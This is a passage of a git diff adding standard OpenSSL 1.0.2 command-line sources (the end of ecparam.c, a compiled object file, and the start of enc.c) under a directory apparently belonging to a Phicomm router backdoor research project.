+ * -list_curves     - prints a list of all currently available curve 'short names'
+ * -conv_form arg   - specifies the point conversion form
+ *                  - possible values: compressed
+ *                                     uncompressed (default)
+ *                                     hybrid
+ * -param_enc arg   - specifies the way the ec parameters are encoded
+ *                    in the asn1 der encoding
+ *                    possible values: named_curve (default)
+ *                                     explicit
+ * -no_seed         - if 'explicit' parameters are chosen do not use the seed
+ * -genkey          - generate ec key
+ * -rand file       - files to use for random number input
+ * -engine e        - use engine e, possibly a hardware device
+ */
+
+static int ecparam_print_var(BIO *, BIGNUM *, const char *, int,
+                             unsigned char *);
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    EC_GROUP *group = NULL;
+    point_conversion_form_t form = POINT_CONVERSION_UNCOMPRESSED;
+    int new_form = 0;
+    int asn1_flag = OPENSSL_EC_NAMED_CURVE;
+    int new_asn1_flag = 0;
+    char *curve_name = NULL, *inrand = NULL;
+    int list_curves = 0, no_seed = 0, check = 0,
+        badops = 0, text = 0, i, need_rand = 0, genkey = 0;
+    char *infile = NULL, *outfile = NULL, *prog;
+    BIO *in = NULL, *out = NULL;
+    int informat, outformat, noout = 0, C = 0, ret = 1;
+    char *engine = NULL;
+
+    BIGNUM *ec_p = NULL, *ec_a = NULL, *ec_b = NULL,
+        *ec_gen = NULL, *ec_order = NULL, *ec_cofactor = NULL;
+    unsigned char *buffer = NULL;
+
+    apps_startup();
+
+    if (bio_err == NULL)
+        if ((bio_err = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_err, stderr, BIO_NOCLOSE | BIO_FP_TEXT);
+
+    if (!load_config(bio_err, NULL))
+        goto end;
+
+    informat = FORMAT_PEM;
+    outformat = FORMAT_PEM;
+
+    prog = argv[0];
+    argc--;
+    argv++;
+    while (argc >= 1) {
+        if (strcmp(*argv, "-inform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            informat = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-outform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outformat = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-in") == 0) {
+            if (--argc < 1)
+                goto bad;
+            infile = *(++argv);
+        } else if (strcmp(*argv, "-out") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outfile = *(++argv);
+        } else if (strcmp(*argv, "-text") == 0)
+            text = 1;
+        else if (strcmp(*argv, "-C") == 0)
+            C = 1;
+        else if (strcmp(*argv, "-check") == 0)
+            check = 1;
+        else if (strcmp(*argv, "-name") == 0) {
+            if (--argc < 1)
+                goto bad;
+            curve_name = *(++argv);
+        } else if (strcmp(*argv, "-list_curves") == 0)
+            list_curves = 1;
+        else if (strcmp(*argv, "-conv_form") == 0) {
+            if (--argc < 1)
+                goto bad;
+            ++argv;
+            new_form = 1;
+            if (strcmp(*argv, "compressed") == 0)
+                form = POINT_CONVERSION_COMPRESSED;
+            else if (strcmp(*argv, "uncompressed") == 0)
+                form = POINT_CONVERSION_UNCOMPRESSED;
+            else if (strcmp(*argv, "hybrid") == 0)
+                form = POINT_CONVERSION_HYBRID;
+            else
+                goto bad;
+        } else if (strcmp(*argv, "-param_enc") == 0) {
+            if (--argc < 1)
+                goto bad;
+            ++argv;
+            new_asn1_flag = 1;
+            if (strcmp(*argv, "named_curve") == 0)
+                asn1_flag = OPENSSL_EC_NAMED_CURVE;
+            else if (strcmp(*argv, "explicit") == 0)
+                asn1_flag = 0;
+            else
+                goto bad;
+        } else if (strcmp(*argv, "-no_seed") == 0)
+            no_seed = 1;
+        else if (strcmp(*argv, "-noout") == 0)
+            noout = 1;
+        else if (strcmp(*argv, "-genkey") == 0) {
+            genkey = 1;
+            need_rand = 1;
+        } else if (strcmp(*argv, "-rand") == 0) {
+            if (--argc < 1)
+                goto bad;
+            inrand = *(++argv);
+            need_rand = 1;
+        } else if (strcmp(*argv, "-engine") == 0) {
+            if (--argc < 1)
+                goto bad;
+            engine = *(++argv);
+        } else {
+            BIO_printf(bio_err, "unknown option %s\n", *argv);
+            badops = 1;
+            break;
+        }
+        argc--;
+        argv++;
+    }
+
+    if (badops) {
+ bad:
+        BIO_printf(bio_err, "%s [options] <infile >outfile\n", prog);
+        BIO_printf(bio_err, "where options are\n");
+        BIO_printf(bio_err, " -inform arg       input format - "
+                   "default PEM (DER or PEM)\n");
+        BIO_printf(bio_err, " -outform arg      output format - "
+                   "default PEM\n");
+        BIO_printf(bio_err, " -in  arg          input file  - "
+                   "default stdin\n");
+        BIO_printf(bio_err, " -out arg          output file - "
+                   "default stdout\n");
+        BIO_printf(bio_err, " -noout            do not print the "
+                   "ec parameter\n");
+        BIO_printf(bio_err, " -text             print the ec "
+                   "parameters in text form\n");
+        BIO_printf(bio_err, " -check            validate the ec "
+                   "parameters\n");
+        BIO_printf(bio_err, " -C                print a 'C' "
+                   "function creating the parameters\n");
+        BIO_printf(bio_err, " -name arg         use the "
+                   "ec parameters with 'short name' name\n");
+        BIO_printf(bio_err, " -list_curves      prints a list of "
+                   "all currently available curve 'short names'\n");
+        BIO_printf(bio_err, " -conv_form arg    specifies the "
+                   "point conversion form \n");
+        BIO_printf(bio_err, "                   possible values:"
+                   " compressed\n");
+        BIO_printf(bio_err, "                                   "
+                   " uncompressed (default)\n");
+        BIO_printf(bio_err, "                                   "
+                   " hybrid\n");
+        BIO_printf(bio_err, " -param_enc arg    specifies the way"
+                   " the ec parameters are encoded\n");
+        BIO_printf(bio_err, "                   in the asn1 der "
+                   "encoding\n");
+        BIO_printf(bio_err, "                   possible values:"
+                   " named_curve (default)\n");
+        BIO_printf(bio_err, "                                   "
+                   " explicit\n");
+        BIO_printf(bio_err, " -no_seed          if 'explicit'"
+                   " parameters are chosen do not" " use the seed\n");
+        BIO_printf(bio_err, " -genkey           generate ec" " key\n");
+        BIO_printf(bio_err, " -rand file        files to use for"
+                   " random number input\n");
+        BIO_printf(bio_err, " -engine e         use engine e, "
+                   "possibly a hardware device\n");
+        goto end;
+    }
+
+    ERR_load_crypto_strings();
+
+    in = BIO_new(BIO_s_file());
+    out = BIO_new(BIO_s_file());
+    if ((in == NULL) || (out == NULL)) {
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    if (infile == NULL)
+        BIO_set_fp(in, stdin, BIO_NOCLOSE);
+    else {
+        if (BIO_read_filename(in, infile) <= 0) {
+            perror(infile);
+            goto end;
+        }
+    }
+    if (outfile == NULL) {
+        BIO_set_fp(out, stdout, BIO_NOCLOSE);
+# ifdef OPENSSL_SYS_VMS
+        {
+            BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+            out = BIO_push(tmpbio, out);
+        }
+# endif
+    } else {
+        if (BIO_write_filename(out, outfile) <= 0) {
+            perror(outfile);
+            goto end;
+        }
+    }
+
+# ifndef OPENSSL_NO_ENGINE
+    setup_engine(bio_err, engine, 0);
+# endif
+
+    if (list_curves) {
+        EC_builtin_curve *curves = NULL;
+        size_t crv_len = 0;
+        size_t n = 0;
+
+        crv_len = EC_get_builtin_curves(NULL, 0);
+
+        curves = OPENSSL_malloc((int)(sizeof(EC_builtin_curve) * crv_len));
+
+        if (curves == NULL)
+            goto end;
+
+        if (!EC_get_builtin_curves(curves, crv_len)) {
+            OPENSSL_free(curves);
+            goto end;
+        }
+
+        for (n = 0; n < crv_len; n++) {
+            const char *comment;
+            const char *sname;
+            comment = curves[n].comment;
+            sname = OBJ_nid2sn(curves[n].nid);
+            if (comment == NULL)
+                comment = "CURVE DESCRIPTION NOT AVAILABLE";
+            if (sname == NULL)
+                sname = "";
+
+            BIO_printf(out, "  %-10s: ", sname);
+            BIO_printf(out, "%s\n", comment);
+        }
+
+        OPENSSL_free(curves);
+        ret = 0;
+        goto end;
+    }
+
+    if (curve_name != NULL) {
+        int nid;
+
+        /*
+         * workaround for the SECG curve names secp192r1 and secp256r1 (which
+         * are the same as the curves prime192v1 and prime256v1 defined in
+         * X9.62)
+         */
+        if (!strcmp(curve_name, "secp192r1")) {
+            BIO_printf(bio_err, "using curve name prime192v1 "
+                       "instead of secp192r1\n");
+            nid = NID_X9_62_prime192v1;
+        } else if (!strcmp(curve_name, "secp256r1")) {
+            BIO_printf(bio_err, "using curve name prime256v1 "
+                       "instead of secp256r1\n");
+            nid = NID_X9_62_prime256v1;
+        } else
+            nid = OBJ_sn2nid(curve_name);
+
+        if (nid == 0)
+            nid = EC_curve_nist2nid(curve_name);
+
+        if (nid == 0) {
+            BIO_printf(bio_err, "unknown curve name (%s)\n", curve_name);
+            goto end;
+        }
+
+        group = EC_GROUP_new_by_curve_name(nid);
+        if (group == NULL) {
+            BIO_printf(bio_err, "unable to create curve (%s)\n", curve_name);
+            goto end;
+        }
+        EC_GROUP_set_asn1_flag(group, asn1_flag);
+        EC_GROUP_set_point_conversion_form(group, form);
+    } else if (informat == FORMAT_ASN1) {
+        group = d2i_ECPKParameters_bio(in, NULL);
+    } else if (informat == FORMAT_PEM) {
+        group = PEM_read_bio_ECPKParameters(in, NULL, NULL, NULL);
+    } else {
+        BIO_printf(bio_err, "bad input format specified\n");
+        goto end;
+    }
+
+    if (group == NULL) {
+        BIO_printf(bio_err, "unable to load elliptic curve parameters\n");
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    if (new_form)
+        EC_GROUP_set_point_conversion_form(group, form);
+
+    if (new_asn1_flag)
+        EC_GROUP_set_asn1_flag(group, asn1_flag);
+
+    if (no_seed) {
+        EC_GROUP_set_seed(group, NULL, 0);
+    }
+
+    if (text) {
+        if (!ECPKParameters_print(out, group, 0))
+            goto end;
+    }
+
+    if (check) {
+        if (group == NULL)
+            BIO_printf(bio_err, "no elliptic curve parameters\n");
+        BIO_printf(bio_err, "checking elliptic curve parameters: ");
+        if (!EC_GROUP_check(group, NULL)) {
+            BIO_printf(bio_err, "failed\n");
+            ERR_print_errors(bio_err);
+        } else
+            BIO_printf(bio_err, "ok\n");
+
+    }
+
+    if (C) {
+        size_t buf_len = 0, tmp_len = 0;
+        const EC_POINT *point;
+        int is_prime, len = 0;
+        const EC_METHOD *meth = EC_GROUP_method_of(group);
+
+        if ((ec_p = BN_new()) == NULL || (ec_a = BN_new()) == NULL ||
+            (ec_b = BN_new()) == NULL || (ec_gen = BN_new()) == NULL ||
+            (ec_order = BN_new()) == NULL ||
+            (ec_cofactor = BN_new()) == NULL) {
+            perror("OPENSSL_malloc");
+            goto end;
+        }
+
+        is_prime = (EC_METHOD_get_field_type(meth) == NID_X9_62_prime_field);
+
+        if (is_prime) {
+            if (!EC_GROUP_get_curve_GFp(group, ec_p, ec_a, ec_b, NULL))
+                goto end;
+        } else {
+            /* TODO */
+            goto end;
+        }
+
+        if ((point = EC_GROUP_get0_generator(group)) == NULL)
+            goto end;
+        if (!EC_POINT_point2bn(group, point,
+                               EC_GROUP_get_point_conversion_form(group),
+                               ec_gen, NULL))
+            goto end;
+        if (!EC_GROUP_get_order(group, ec_order, NULL))
+            goto end;
+        if (!EC_GROUP_get_cofactor(group, ec_cofactor, NULL))
+            goto end;
+
+        if (!ec_p || !ec_a || !ec_b || !ec_gen || !ec_order || !ec_cofactor)
+            goto end;
+
+        len = BN_num_bits(ec_order);
+
+        if ((tmp_len = (size_t)BN_num_bytes(ec_p)) > buf_len)
+            buf_len = tmp_len;
+        if ((tmp_len = (size_t)BN_num_bytes(ec_a)) > buf_len)
+            buf_len = tmp_len;
+        if ((tmp_len = (size_t)BN_num_bytes(ec_b)) > buf_len)
+            buf_len = tmp_len;
+        if ((tmp_len = (size_t)BN_num_bytes(ec_gen)) > buf_len)
+            buf_len = tmp_len;
+        if ((tmp_len = (size_t)BN_num_bytes(ec_order)) > buf_len)
+            buf_len = tmp_len;
+        if ((tmp_len = (size_t)BN_num_bytes(ec_cofactor)) > buf_len)
+            buf_len = tmp_len;
+
+        buffer = (unsigned char *)OPENSSL_malloc(buf_len);
+
+        if (buffer == NULL) {
+            perror("OPENSSL_malloc");
+            goto end;
+        }
+
+        ecparam_print_var(out, ec_p, "ec_p", len, buffer);
+        ecparam_print_var(out, ec_a, "ec_a", len, buffer);
+        ecparam_print_var(out, ec_b, "ec_b", len, buffer);
+        ecparam_print_var(out, ec_gen, "ec_gen", len, buffer);
+        ecparam_print_var(out, ec_order, "ec_order", len, buffer);
+        ecparam_print_var(out, ec_cofactor, "ec_cofactor", len, buffer);
+
+        BIO_printf(out, "\n\n");
+
+        BIO_printf(out, "EC_GROUP *get_ec_group_%d(void)\n\t{\n", len);
+        BIO_printf(out, "\tint ok=0;\n");
+        BIO_printf(out, "\tEC_GROUP *group = NULL;\n");
+        BIO_printf(out, "\tEC_POINT *point = NULL;\n");
+        BIO_printf(out, "\tBIGNUM   *tmp_1 = NULL, *tmp_2 = NULL, "
+                   "*tmp_3 = NULL;\n\n");
+        BIO_printf(out, "\tif ((tmp_1 = BN_bin2bn(ec_p_%d, "
+                   "sizeof(ec_p_%d), NULL)) == NULL)\n\t\t"
+                   "goto err;\n", len, len);
+        BIO_printf(out, "\tif ((tmp_2 = BN_bin2bn(ec_a_%d, "
+                   "sizeof(ec_a_%d), NULL)) == NULL)\n\t\t"
+                   "goto err;\n", len, len);
+        BIO_printf(out, "\tif ((tmp_3 = BN_bin2bn(ec_b_%d, "
+                   "sizeof(ec_b_%d), NULL)) == NULL)\n\t\t"
+                   "goto err;\n", len, len);
+        if (is_prime) {
+            BIO_printf(out, "\tif ((group = EC_GROUP_new_curve_"
+                       "GFp(tmp_1, tmp_2, tmp_3, NULL)) == NULL)"
+                       "\n\t\tgoto err;\n\n");
+        } else {
+            /* TODO */
+            goto end;
+        }
+        BIO_printf(out, "\t/* build generator */\n");
+        BIO_printf(out, "\tif ((tmp_1 = BN_bin2bn(ec_gen_%d, "
+                   "sizeof(ec_gen_%d), tmp_1)) == NULL)"
+                   "\n\t\tgoto err;\n", len, len);
+        BIO_printf(out, "\tpoint = EC_POINT_bn2point(group, tmp_1, "
+                   "NULL, NULL);\n");
+        BIO_printf(out, "\tif (point == NULL)\n\t\tgoto err;\n");
+        BIO_printf(out, "\tif ((tmp_2 = BN_bin2bn(ec_order_%d, "
+                   "sizeof(ec_order_%d), tmp_2)) == NULL)"
+                   "\n\t\tgoto err;\n", len, len);
+        BIO_printf(out, "\tif ((tmp_3 = BN_bin2bn(ec_cofactor_%d, "
+                   "sizeof(ec_cofactor_%d), tmp_3)) == NULL)"
+                   "\n\t\tgoto err;\n", len, len);
+        BIO_printf(out, "\tif (!EC_GROUP_set_generator(group, point,"
+                   " tmp_2, tmp_3))\n\t\tgoto err;\n");
+        BIO_printf(out, "\n\tok=1;\n");
+        BIO_printf(out, "err:\n");
+        BIO_printf(out, "\tif (tmp_1)\n\t\tBN_free(tmp_1);\n");
+        BIO_printf(out, "\tif (tmp_2)\n\t\tBN_free(tmp_2);\n");
+        BIO_printf(out, "\tif (tmp_3)\n\t\tBN_free(tmp_3);\n");
+        BIO_printf(out, "\tif (point)\n\t\tEC_POINT_free(point);\n");
+        BIO_printf(out, "\tif (!ok)\n");
+        BIO_printf(out, "\t\t{\n");
+        BIO_printf(out, "\t\tEC_GROUP_free(group);\n");
+        BIO_printf(out, "\t\tgroup = NULL;\n");
+        BIO_printf(out, "\t\t}\n");
+        BIO_printf(out, "\treturn(group);\n\t}\n");
+    }
+
+    if (!noout) {
+        if (outformat == FORMAT_ASN1)
+            i = i2d_ECPKParameters_bio(out, group);
+        else if (outformat == FORMAT_PEM)
+            i = PEM_write_bio_ECPKParameters(out, group);
+        else {
+            BIO_printf(bio_err, "bad output format specified for"
+                       " outfile\n");
+            goto end;
+        }
+        if (!i) {
+            BIO_printf(bio_err, "unable to write elliptic "
+                       "curve parameters\n");
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+    }
+
+    if (need_rand) {
+        app_RAND_load_file(NULL, bio_err, (inrand != NULL));
+        if (inrand != NULL)
+            BIO_printf(bio_err, "%ld semi-random bytes loaded\n",
+                       app_RAND_load_files(inrand));
+    }
+
+    if (genkey) {
+        EC_KEY *eckey = EC_KEY_new();
+
+        if (eckey == NULL)
+            goto end;
+
+        assert(need_rand);
+
+        if (EC_KEY_set_group(eckey, group) == 0)
+            goto end;
+
+        if (!EC_KEY_generate_key(eckey)) {
+            EC_KEY_free(eckey);
+            goto end;
+        }
+        if (outformat == FORMAT_ASN1)
+            i = i2d_ECPrivateKey_bio(out, eckey);
+        else if (outformat == FORMAT_PEM)
+            i = PEM_write_bio_ECPrivateKey(out, eckey, NULL,
+                                           NULL, 0, NULL, NULL);
+        else {
+            BIO_printf(bio_err, "bad output format specified "
+                       "for outfile\n");
+            EC_KEY_free(eckey);
+            goto end;
+        }
+        EC_KEY_free(eckey);
+    }
+
+    if (need_rand)
+        app_RAND_write_file(NULL, bio_err);
+
+    ret = 0;
+ end:
+    if (ec_p)
+        BN_free(ec_p);
+    if (ec_a)
+        BN_free(ec_a);
+    if (ec_b)
+        BN_free(ec_b);
+    if (ec_gen)
+        BN_free(ec_gen);
+    if (ec_order)
+        BN_free(ec_order);
+    if (ec_cofactor)
+        BN_free(ec_cofactor);
+    if (buffer)
+        OPENSSL_free(buffer);
+    if (in != NULL)
+        BIO_free(in);
+    if (out != NULL)
+        BIO_free_all(out);
+    if (group != NULL)
+        EC_GROUP_free(group);
+    apps_shutdown();
+    OPENSSL_EXIT(ret);
+}
+
+static int ecparam_print_var(BIO *out, BIGNUM *in, const char *var,
+                             int len, unsigned char *buffer)
+{
+    BIO_printf(out, "static unsigned char %s_%d[] = {", var, len);
+    if (BN_is_zero(in))
+        BIO_printf(out, "\n\t0x00");
+    else {
+        int i, l;
+
+        l = BN_bn2bin(in, buffer);
+        for (i = 0; i < l - 1; i++) {
+            if ((i % 12) == 0)
+                BIO_printf(out, "\n\t");
+            BIO_printf(out, "0x%02X,", buffer[i]);
+        }
+        if ((i % 12) == 0)
+            BIO_printf(out, "\n\t");
+        BIO_printf(out, "0x%02X", buffer[i]);
+    }
+    BIO_printf(out, "\n\t};\n\n");
+    return 1;
+}
+#else                           /* !OPENSSL_NO_EC */
+
+# if PEDANTIC
+static void *dummy = &dummy;
+# endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ecparam.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ecparam.o
new file mode 100644
index 0000000000000000000000000000000000000000..937692f20f8d8a58999f2cfff1e8b565a5269323
GIT binary patch
literal 1080
zcmbVLO-sW-5S?`E_eF1lmwHmsE~y`g9wbm|FCtzFf~QRk3MC&T8?YDs3;rCB{Y(A=
zok@0a*-brkVDfg}zBfDBv>&6p+m7df4i9eNuhJ~Qmq7+K9l$1R0E~yj>)zoctWsI^
zuJ{@E`-97>E(h<YKKIX$8oKG#McBq%!5rUDpaU=`j$!^6bbJ@Sf7&#xbz<s?-CKe!
zIE~d)xdsNSE{P1oiJXX|TofYV5dbe|i4-BCEE;^(D;d8@;Lkz|;9*$;kFq3*Q{>W2
z#vE^^UrG^8RsE7yJTJ05F67KPaVcUCU391Rn*|HH8K1va?BkO-`@048uKTe42Pj#`
zT-JYrUh3&%nh~ht*d%eS&)0ZiaHe!>7RFlpG&RD-8m9dV%ax#~Py@ZI8Pw1A(*CCs
p%@vYQCsDhK$A6x4ceM4O2HjFR4fgyyxMANtX`htvQ5zN7{$Cv^IX3_R

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/enc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/enc.c
new file mode 100644
index 0000000..5c2cf7a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/enc.c
@@ -0,0 +1,710 @@
+/* apps/enc.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include "apps.h"
+#include <openssl/bio.h>
+#include <openssl/err.h>
+#include <openssl/evp.h>
+#include <openssl/objects.h>
+#include <openssl/x509.h>
+#include <openssl/rand.h>
+#include <openssl/pem.h>
+#ifndef OPENSSL_NO_COMP
+# include <openssl/comp.h>
+#endif
+#include <ctype.h>
+
+int set_hex(char *in, unsigned char *out, int size);
+#undef SIZE
+#undef BSIZE
+#undef PROG
+
+#define SIZE    (512)
+#define BSIZE   (8*1024)
+#define PROG    enc_main
+
+static void show_ciphers(const OBJ_NAME *name, void *bio_)
+{
+    BIO *bio = bio_;
+    static int n;
+
+    if (!islower((unsigned char)*name->name))
+        return;
+
+    BIO_printf(bio, "-%-25s", name->name);
+    if (++n == 3) {
+        BIO_printf(bio, "\n");
+        n = 0;
+    } else
+        BIO_printf(bio, " ");
+}
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    static const char magic[] = "Salted__";
+    char mbuf[sizeof magic - 1];
+    char *strbuf = NULL;
+    unsigned char *buff = NULL, *bufsize = NULL;
+    int bsize = BSIZE, verbose = 0;
+    int ret = 1, inl;
+    int nopad = 0;
+    unsigned char key[EVP_MAX_KEY_LENGTH], iv[EVP_MAX_IV_LENGTH];
+    unsigned char salt[PKCS5_SALT_LEN];
+    char *str = NULL, *passarg = NULL, *pass = NULL;
+    char *hkey = NULL, *hiv = NULL, *hsalt = NULL;
+    char *md = NULL;
+    int enc = 1, printkey = 0, i, base64 = 0;
+#ifdef ZLIB
+    int do_zlib = 0;
+    BIO *bzl = NULL;
+#endif
+    int debug = 0, olb64 = 0, nosalt = 0;
+    const EVP_CIPHER *cipher = NULL, *c;
+    EVP_CIPHER_CTX *ctx = NULL;
+    char *inf = NULL, *outf = NULL;
+    BIO *in = NULL, *out = NULL, *b64 = NULL, *benc = NULL, *rbio =
+        NULL, *wbio = NULL;
+#define PROG_NAME_SIZE  39
+    char pname[PROG_NAME_SIZE + 1];
+#ifndef OPENSSL_NO_ENGINE
+    char *engine = NULL;
+#endif
+    const EVP_MD *dgst = NULL;
+    int non_fips_allow = 0;
+
+    apps_startup();
+
+    if (bio_err == NULL)
+        if ((bio_err = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_err, stderr, BIO_NOCLOSE | BIO_FP_TEXT);
+
+    if (!load_config(bio_err, NULL))
+        goto end;
+
+    /* first check the program name */
+    program_name(argv[0], pname, sizeof pname);
+    if (strcmp(pname, "base64") == 0)
+        base64 = 1;
+#ifdef ZLIB
+    if (strcmp(pname, "zlib") == 0)
+        do_zlib = 1;
+#endif
+
+    cipher = EVP_get_cipherbyname(pname);
+#ifdef ZLIB
+    if (!do_zlib && !base64 && (cipher == NULL)
+        && (strcmp(pname, "enc") != 0))
+#else
+    if (!base64 && (cipher == NULL) && (strcmp(pname, "enc") != 0))
+#endif
+    {
+        BIO_printf(bio_err, "%s is an unknown cipher\n", pname);
+        goto bad;
+    }
+
+    argc--;
+    argv++;
+    while (argc >= 1) {
+        if (strcmp(*argv, "-e") == 0)
+            enc = 1;
+        else if (strcmp(*argv, "-in") == 0) {
+            if (--argc < 1)
+                goto bad;
+            inf = *(++argv);
+        } else if (strcmp(*argv, "-out") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outf = *(++argv);
+        } else if (strcmp(*argv, "-pass") == 0) {
+            if (--argc < 1)
+                goto bad;
+            passarg = *(++argv);
+        }
+#ifndef OPENSSL_NO_ENGINE
+        else if (strcmp(*argv, "-engine") == 0) {
+            if (--argc < 1)
+                goto bad;
+            engine = *(++argv);
+        }
+#endif
+        else if (strcmp(*argv, "-d") == 0)
+            enc = 0;
+        else if (strcmp(*argv, "-p") == 0)
+            printkey = 1;
+        else if (strcmp(*argv, "-v") == 0)
+            verbose = 1;
+        else if (strcmp(*argv, "-nopad") == 0)
+            nopad = 1;
+        else if (strcmp(*argv, "-salt") == 0)
+            nosalt = 0;
+        else if (strcmp(*argv, "-nosalt") == 0)
+            nosalt = 1;
+        else if (strcmp(*argv, "-debug") == 0)
+            debug = 1;
+        else if (strcmp(*argv, "-P") == 0)
+            printkey = 2;
+        else if (strcmp(*argv, "-A") == 0)
+            olb64 = 1;
+        else if (strcmp(*argv, "-a") == 0)
+            base64 = 1;
+        else if (strcmp(*argv, "-base64") == 0)
+            base64 = 1;
+#ifdef ZLIB
+        else if (strcmp(*argv, "-z") == 0)
+            do_zlib = 1;
+#endif
+        else if (strcmp(*argv, "-bufsize") == 0) {
+            if (--argc < 1)
+                goto bad;
+            bufsize = (unsigned char *)*(++argv);
+        } else if (strcmp(*argv, "-k") == 0) {
+            if (--argc < 1)
+                goto bad;
+            str = *(++argv);
+        } else if (strcmp(*argv, "-kfile") == 0) {
+            static char buf[128];
+            FILE *infile;
+            char *file;
+
+            if (--argc < 1)
+                goto bad;
+            file = *(++argv);
+            infile = fopen(file, "r");
+            if (infile == NULL) {
+                BIO_printf(bio_err, "unable to read key from '%s'\n", file);
+                goto bad;
+            }
+            buf[0] = '\0';
+            if (!fgets(buf, sizeof buf, infile)) {
+                BIO_printf(bio_err, "unable to read key from '%s'\n", file);
+                goto bad;
+            }
+            fclose(infile);
+            i = strlen(buf);
+            if ((i > 0) && ((buf[i - 1] == '\n') || (buf[i - 1] == '\r')))
+                buf[--i] = '\0';
+            if ((i > 0) && ((buf[i - 1] == '\n') || (buf[i - 1] == '\r')))
+                buf[--i] = '\0';
+            if (i < 1) {
+                BIO_printf(bio_err, "zero length password\n");
+                goto bad;
+            }
+            str = buf;
+        } else if (strcmp(*argv, "-K") == 0) {
+            if (--argc < 1)
+                goto bad;
+            hkey = *(++argv);
+        } else if (strcmp(*argv, "-S") == 0) {
+            if (--argc < 1)
+                goto bad;
+            hsalt = *(++argv);
+        } else if (strcmp(*argv, "-iv") == 0) {
+            if (--argc < 1)
+                goto bad;
+            hiv = *(++argv);
+        } else if (strcmp(*argv, "-md") == 0) {
+            if (--argc < 1)
+                goto bad;
+            md = *(++argv);
+        } else if (strcmp(*argv, "-non-fips-allow") == 0)
+            non_fips_allow = 1;
+        else if ((argv[0][0] == '-') &&
+                 ((c = EVP_get_cipherbyname(&(argv[0][1]))) != NULL)) {
+            cipher = c;
+        } else if (strcmp(*argv, "-none") == 0)
+            cipher = NULL;
+        else {
+            BIO_printf(bio_err, "unknown option '%s'\n", *argv);
+ bad:
+            BIO_printf(bio_err, "options are\n");
+            BIO_printf(bio_err, "%-14s input file\n", "-in <file>");
+            BIO_printf(bio_err, "%-14s output file\n", "-out <file>");
+            BIO_printf(bio_err, "%-14s pass phrase source\n", "-pass <arg>");
+            BIO_printf(bio_err, "%-14s encrypt\n", "-e");
+            BIO_printf(bio_err, "%-14s decrypt\n", "-d");
+            BIO_printf(bio_err,
+                       "%-14s base64 encode/decode, depending on encryption flag\n",
+                       "-a/-base64");
+            BIO_printf(bio_err, "%-14s passphrase is the next argument\n",
+                       "-k");
+            BIO_printf(bio_err,
+                       "%-14s passphrase is the first line of the file argument\n",
+                       "-kfile");
+            BIO_printf(bio_err,
+                       "%-14s the next argument is the md to use to create a key\n",
+                       "-md");
